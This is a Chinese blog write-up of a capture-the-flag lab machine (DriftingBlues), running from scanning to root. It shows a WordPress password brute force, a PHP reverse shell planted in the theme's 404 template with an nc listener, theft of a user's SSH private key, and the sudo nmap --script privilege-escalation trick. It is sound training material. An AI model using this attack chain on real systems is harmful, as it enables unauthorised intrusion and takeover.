前言:又到了“美好”的写博客时间了,这篇文章是在2023年期间写的(Reload是24年重制版),有很多地方考虑欠佳,修改后与排版尽量变好了,内容也增加了,主要是开的靶机附录的坑还没有开始填...
一、信息收集
# Nmap 7.93 scan initiated Thu Jul 27 07:24:30 2023 as: nmap -sT -sC -sV -O -A -p21,22,80 -o nmap_details.txt 192.168.56.109
Nmap scan report for 192.168.56.109
Host is up (0.00059s latency).PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x 1 ftp ftp 1403770 Dec 17 2020 secret.jpg
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6afed61723cb90792bb12d3753974658 (RSA)
|_ 256 5bc468d18959d748b096f311871c08ac (ECDSA)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:09:67:57 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
发现/blog页面
进入后发现页面加载不全
Add:这里的原因可能有很多,我也懒得去再找出这个靶机了,一般来说必须要用域名去解析的可能就是使用绝对URL来加载资源、依赖于主机名来提供内容、跨域访问问题或者可能是防火墙之类的。这里应该是第二种吧。
curl -i -L http://192.168.0.144/blog
发现源代码中有向driftingblues.box获取请求的信息,修改hosts文件
gobuster dir -u http://192.168.0.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php
再次载入发现页面载入完全。
二、web渗透
发现底部有 Proudly powered by WordPress. 字样
怀疑页面由wordpress搭建成
wpscan --url http://driftingblues.box/blog/ -e u
[+] URL: http://driftingblues.box/blog/ [192.168.0.144]
[+] Started: Thu Jul 27 23:56:02 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://driftingblues.box/blog/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://driftingblues.box/blog/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://driftingblues.box/blog/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://driftingblues.box/blog/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.6 identified (Insecure, released on 2020-12-08).
| Found By: Rss Generator (Passive Detection)
| - http://driftingblues.box/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.6</generator>
| - http://driftingblues.box/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://driftingblues.box/blog/wp-content/themes/twentytwentyone/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://driftingblues.box/blog/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.8
| Style URL: http://driftingblues.box/blog/wp-content/themes/twentytwentyone/style.css?ver=1.0
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://driftingblues.box/blog/wp-content/themes/twentytwentyone/style.css?ver=1.0, Match: 'Version: 1.0'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] albert
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://driftingblues.box/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
发现albert用户存在,进行密码爆破:
wpscan --url http://driftingblues.box/blog/ -e u -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: albert, Password: scotland1
成功爆破出密码
登录wordpress后台,发现为管理员账号密码
在Appearance 的 Theme Editor里修改404 Template (404.php)源码为reverse_shell.php的源码
访问一个不存在的网站,如:
http://driftingblues.box/blog/index.php/2020/12/17/crosscut-1
成功获得shell
Add:
???这是啥???
我简单一说,基本原理就是wp的admin是有修改页面和添加php代码的权限,这里本地并没有进行一些敏感标签过滤。所以随便在网上找一个反弹shell的php代码就可以的,导入进404页面,然后去去触发那个页面,本地nc监听就可以拿到反弹shell了
nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.0.145] from (UNKNOWN) [192.168.0.144] 36564
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
23:27:44 up 40 min, 0 users, load average: 0.37, 0.10, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
三、提权
ls -l /home
drwxr-xr-x 3 freddie freddie 4096 Dec 17 2020 freddie
ls -liah
total 28K
129281 drwxr-xr-x 3 freddie freddie 4.0K Dec 17 2020 .
2 drwxr-xr-x 3 root root 4.0K Dec 17 2020 ..
129284 -rw-r--r-- 1 freddie freddie 220 Dec 17 2020 .bash_logout
129283 -rw-r--r-- 1 freddie freddie 3.5K Dec 17 2020 .bashrc
129282 -rw-r--r-- 1 freddie freddie 807 Dec 17 2020 .profile
129285 drwxr-xr-x 2 freddie freddie 4.0K Dec 17 2020 .ssh
129289 -r-------- 1 freddie freddie 1.8K Dec 17 2020 user.txt
发现.ssh文件
进入后发现id_rsa私钥
$python --version
Python 2.7.16
$python2 -m SimpleHTTPServer 7777
#wget http://192.168.0.144:7777/id_rsa
#chmod 600 id_rsa
#ssh freddie -i id_rsa
Add:ok有点行云流水我来简单说一下。
py -v这一步是看一些有没有python这个程序包,如果有,python能实现的东西可太多了,比如最常用的一些提高交互性啊,建立简单的文件http传输服务啊,这些百度一下都有,在这里就不再增加篇幅了
成功登录freddie用户
freddie@driftingblues:~$ sudo -l
Matching Defaults entries for freddie on driftingblues:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User freddie may run the following commands on driftingblues:
(root) NOPASSWD: /usr/bin/nmap
查询GTFObins网站,得到利用方式
Add:这个网站很重要,一定要记住,这个是专门查linux二进制文件利用的,还有用windows 可执行文件利用的LOLBAS
LOLBAS (lolbas-project.github.io)https://lolbas-project.github.io/ GTFOBinshttps://gtfobins.github.io/
$TF=$mktemp
$echo 'os.execute("/bin/sh")' > $TF
$sudo nmap --script=$TF
启动后成功提权,但是输入命令并不显示
(无显示)输入python2 -c 'import pty;pty.spawn("/bin/bash")'解决
root@driftingblues:/home/freddie# whoami
root
root@driftingblues:~# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!